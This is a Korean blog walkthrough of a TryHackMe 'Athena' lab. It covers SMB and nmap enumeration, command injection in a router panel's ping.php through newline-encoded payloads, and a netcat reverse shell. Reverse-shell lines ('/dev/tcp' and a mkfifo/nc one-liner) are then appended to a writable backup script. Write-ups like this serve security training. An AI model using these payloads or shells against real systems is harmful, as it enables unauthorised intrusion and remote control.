호그와트

tryhackme athena fantasia :: tryhackme GOD의 풀이

영웅*^%&$ 2024. 5. 5. 01:04
728x90

Starting Nmap 7.60 ( https://nmap.org ) at 2024-05-04 00:54 BST
Host is up (0.038s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 02:E7:1F:28:DF:9F (Unknown)

nmap -sV 10.10.244.72 -p 22,80,139,445

Starting Nmap 7.60 ( https://nmap.org ) at 2024-05-04 01:00 BST
Nmap scan report for atena.thm (10.10.244.72)
Host is up (0.00018s latency).

PORT    STATE SERVICE       VERSION
22/tcp  open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http          Apache httpd 2.4.41 ((Ubuntu))
139/tcp open  netbios-ssn?
445/tcp open  microsoft-ds?
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port139-TCP:V=7.60%I=7%D=5/4%Time=66357AB6%P=x86_64-pc-linux-gnu%r(SMBP
SF:rogNeg,29,"\0\0\0%\xffSMBr\0\0\0\0\x88\x03@\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:@\x06\0\0\x01\0\x01\xff\xff\0\0");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port445-TCP:V=7.60%I=7%D=5/4%Time=66357AB1%P=x86_64-pc-linux-gnu%r(SMBP
SF:rogNeg,29,"\0\0\0%\xffSMBr\0\0\0\0\x88\x03@\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:@\x06\0\0\x01\0\x01\xff\xff\0\0");
MAC Address: 02:E7:1F:28:DF:9F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



## enum4linux -a 10.10.244.72   ~~ Pentesting SMB?

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-22-1-1000 Unix User\ubuntu (Local User)
S-1-22-1-1001 Unix User\athena (Local User)

hmm athena and ubuntu as users 


`enum4linux -a 10.10.27.81`

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.27.81
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 10.10.27.81    |
 =================================================== 
[+] Got domain/workgroup name: SAMBA

 =========================================== 
|    Nbtstat Information for 10.10.27.81    |
 =========================================== 
Looking up status of 10.10.27.81
ROUTERPANEL     <00> -         B <ACTIVE>  Workstation Service
ROUTERPANEL     <03> -         B <ACTIVE>  Messenger Service
ROUTERPANEL     <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
SAMBA           <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
SAMBA           <1d> -         B <ACTIVE>  Master Browser
SAMBA           <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

MAC Address = 00-00-00-00-00-00

 ==================================== 
|    Session Check on 10.10.27.81    |
 ==================================== 
[+] Server 10.10.27.81 allows sessions using username '', password ''

 ========================================== 
|    Getting domain SID for 10.10.27.81    |
 ========================================== 
Domain Name: SAMBA
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ===================================== 
|    OS information on 10.10.27.81    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
[+] Got OS info for 10.10.27.81 from smbclient: 
[+] Got OS info for 10.10.27.81 from srvinfo:
ROUTERPANEL    Wk Sv PrQ Unx NT SNT Samba 4.15.13-Ubuntu
platform_id     : 500
os version      : 6.1
server type     : 0x809a03

 ============================ 
|    Users on 10.10.27.81    |
 ============================ 
Use of uninitialized value $users in print at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 876.
Use of uninitialized value $users in pattern match (m//) at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 879.

Use of uninitialized value $users in print at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 892.
Use of uninitialized value $users in pattern match (m//) at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 894.

 ======================================== 
|    Share Enumeration on 10.10.27.81    |
 ======================================== 
WARNING: The "syslog" option is deprecated

Sharename       Type      Comment
---------       ----      -------
public          Disk      
IPC$            IPC       IPC Service (Samba 4.15.13-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Failed to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.27.81
//10.10.27.81/public Mapping: OK, Listing: OK
//10.10.27.81/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 =================================================== 
|    Password Policy Information for 10.10.27.81    |
 =================================================== 
[E] Dependent program "polenum.py" not present.  Skipping this check.  Download polenum from http://labs.portcullis.co.uk/application/polenum/


 ============================= 
|    Groups on 10.10.27.81    |
 ============================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ====================================================================== 
|    Users on 10.10.27.81 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1444009243-207373887-3299893081
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\ubuntu (Local User)
S-1-22-1-1001 Unix User\athena (Local User)
[+] Enumerating users using SID S-1-5-21-1444009243-207373887-3299893081 and logon username '', password ''
S-1-5-21-1444009243-207373887-3299893081-500 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-501 ROUTERPANEL\nobody (Local User)
S-1-5-21-1444009243-207373887-3299893081-502 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-503 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-504 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-505 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-506 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-507 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-508 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-509 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-510 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-511 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-512 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-513 ROUTERPANEL\None (Domain Group)
S-1-5-21-1444009243-207373887-3299893081-514 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-515 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-516 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-517 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-518 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-519 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-520 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-521 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-522 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-523 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-524 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-525 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-526 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-527 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-528 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-529 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-530 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-531 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-532 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-533 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-534 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-535 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-536 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-537 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-538 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-539 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-540 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-541 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-542 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-543 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-544 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-545 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-546 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-547 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-548 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-549 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-550 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1000 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1001 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1002 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1003 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1004 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1005 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1006 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1007 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1008 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1009 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1010 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1011 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1012 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1013 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1014 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1015 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1016 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1017 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1018 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1019 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1020 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1021 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1022 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1023 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1024 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1025 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1026 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1027 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1028 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1029 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1030 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1031 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1032 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1033 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1034 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1035 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1036 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1037 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1038 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1039 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1040 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1041 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1042 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1043 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1044 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1045 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1046 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1047 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1048 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1049 *unknown*\*unknown* (8)
S-1-5-21-1444009243-207373887-3299893081-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)

we have share enumeration information 
`smbclient -N -L \\\\10.10.27.81`

and in that, we found public so let's get it 
`smbclient \\\\10.10.27.81\\public`

in here we found '/myrouterpanel' directory information 
so now let get back to firefox web stie 

http://athena.thm/myrouterpanel/
127.0.0.1';ls

ip=127.0.0.1+%0A/usr/bin/id&submit=


This_is_the_ping.php (below)
<?php

// ip=127.0.0.1+%0A/usr/bin/id&submit=

// ip=127.0.0.1+%0Acat%20ping.php&submit=

if (isset($_POST['submit'])) {

    $host = $_POST['ip'];

  

    // Validate input

    if (containsMaliciousCharacters($host)) {

        echo "Attempt hacking!";

        exit;

    }

  

    // Execute command safely

    $cmd = "ping -c 4 " . $host;

    $output = shell_exec($cmd);

  

    if (!$output) {

        echo "Failed to execute ping.";

        exit;

    }

  

    echo "<pre>" . $output . "</pre>";

}

  

function containsMaliciousCharacters($input) {

    // Define the set of characters to check for

    $maliciousChars = array(';', '&', '|');

  

    // Check if any of the malicious characters exist in the input

    foreach ($maliciousChars as $char) {

        if (stripos($input, $char) !== false) {

            return true;

        }

    }

  

    return false;

}

?>



POST /myrouterpanel/ping.php HTTP/1.1
Host: athena.thm
Content-Length: 39
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://athena.thm
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://athena.thm/myrouterpanel/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

ip=127.0.0.1+%0Acd%20/etc+%0Als&submit=


HTTP/1.1 200 OK
Date: Sat, 04 May 2024 13:51:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2645
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.016 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.034 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.032 ms

--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3061ms
rtt min/avg/max/mdev = 0.016/0.031/0.044/0.010 ms
ModemManager
NetworkManager
PackageKit
UPower
X11
acpi
adduser.conf
alsa
alternatives
anacrontab
apache2
apg.conf
apm
apparmor
apparmor.d
apport
appstream.conf
apt
avahi
bash.bashrc
bash_completion
bash_completion.d
bindresvport.blacklist
binfmt.d
bluetooth
brltty
brltty.conf
ca-certificates
ca-certificates.conf
ca-certificates.conf.dpkg-old
calendar
chatscripts
console-setup
cracklib
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
cups
cupshelpers
dbus-1
dconf
debconf.conf
debian_version
default
deluser.conf
depmod.d
dhcp
dictionaries-common
dpkg
e2scrub.conf
emacs
environment
environment.d
ethertypes
fonts
fprintd.conf
fstab
fstab.orig
fuse.conf
fwupd
gai.conf
gamemode.ini
gdb
gdm3
geoclue
ghostscript
glvnd
gnome
groff
group
group-
grub.d
gshadow
gshadow-
gss
gtk-2.0
gtk-3.0
hdparm.conf
host.conf
hostid
hostname
hosts
hosts.allow
hosts.deny
hp
ifplugd
init
init.d
initramfs-tools
inputrc
insserv.conf.d
iproute2
issue
issue.net
kernel
kernel-img.conf
kerneloops.conf
ld.so.cache
ld.so.conf
ld.so.conf.d
ldap
legal
libao.conf
libaudit.conf
libblockdev
libibverbs.d
libnl-3
libpaper.d
locale.alias
locale.gen
localtime
logcheck
login.defs
logrotate.conf
logrotate.d
lsb-release
ltrace.conf
machine-id
magic
magic.mime
mailcap
mailcap.order
manpath.config
mime.types
mke2fs.conf
modprobe.d
modules
modules-load.d
mtab
mtools.conf
mysql
nanorc
netplan
network
networkd-dispatcher
networks
newt
nsswitch.conf
openvpn
opt
os-release
pam.conf
pam.d
papersize
passwd
passwd-
pcmcia
perl
php
pki
pm
pnm2ppa.conf
polkit-1
popularity-contest.conf
ppp
profile
profile.d
protocols
pulse
python3
python3.8
rc.local
rc.local.vmimport
rc0.d
rc1.d
rc2.d
rc3.d
rc4.d
rc5.d
rc6.d
rcS.d
resolv.conf
rmt
rpc
rsyslog.conf
rsyslog.d
rygel.conf
samba
sane.d
security
selinux
sensors.d
sensors3.conf
services
sgml
shadow
shadow-
shells
skel
snmp
speech-dispatcher
ssh
ssl
subgid
subgid-
subuid
subuid-
sudoers
sudoers.d
sysctl.conf
sysctl.d
systemd
terminfo
thermald
timezone
tmpfiles.d
ubuntu-advantage
ucf.conf
udev
udisks2
ufw
update-manager
update-motd.d
update-notifier
usb_modeswitch.conf
usb_modeswitch.d
vim
vmware-tools
vtrgb
vulkan
wgetrc
wpa_supplicant
xattr.conf
xdg
xml
zsh_command_not_found
</pre>



ip=127.0.0.1+%0A/usr/bin/nc+10.10.90.2+5678+-e+/bin/bash&submit=
++ nc -lvnp 5678  (in my local)

python3 -c 'import pty;pty.spawn("/bin/bash")' (after linking)
can change /usr/share/backup/backup.sh      this file  
cat << 'EOF' >> backup.sh
#!/bin/bash

# Reverse shell command
sh -i >& /dev/tcp/10.10.90.2/9001 0>&1

# Backup directory variable
backup_dir_zip=~/backup

# Ensure the backup directory exists
mkdir -p "$backup_dir_zip"

# Copy all files from notes to backup directory
cp -r /home/athena/notes/* "$backup_dir_zip"

# Zip the contents of the backup directory
zip -r "$backup_dir_zip/notes_backup.zip" "$backup_dir_zip"

# Remove all .txt and .sh files from the specific directory
rm /home/athena/backup/*.txt
rm /home/athena/backup/*.sh

echo "Backup completed..."
EOF

cat << 'EOF' >> backup.sh
#!/bin/bash

# Reverse shell command
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.90.2 443

# Backup directory variable
backup_dir_zip=~/backup

# Ensure the backup directory exists
mkdir -p "$backup_dir_zip"

# Copy all files from notes to backup directory
cp -r /home/athena/notes/* "$backup_dir_zip"

# Zip the contents of the backup directory
zip -r "$backup_dir_zip/notes_backup.zip" "$backup_dir_zip"

# Remove all .txt and .sh files from the specific directory
rm /home/athena/backup/*.txt
rm /home/athena/backup/*.sh

echo "Backup completed..."
EOF

728x90
저작자표시

'호그와트' 카테고리의 다른 글

Docker 설치 진짜 개 쉽게 하는 법 (Windows WSL 2)  (1) 2024.05.13
넘어간다제~  (0) 2024.05.06
improving fuzzy fuzzy !!  (2) 2024.05.03
사과 팝니다 한 입 하세요~~  (0) 2024.05.02
어느새 Java가 나의 모국어가 되었다  (0) 2024.01.24

'호그와트'의 다른글

  • 현재글tryhackme athena fantasia :: tryhackme GOD의 풀이

관련글

티스토리툴바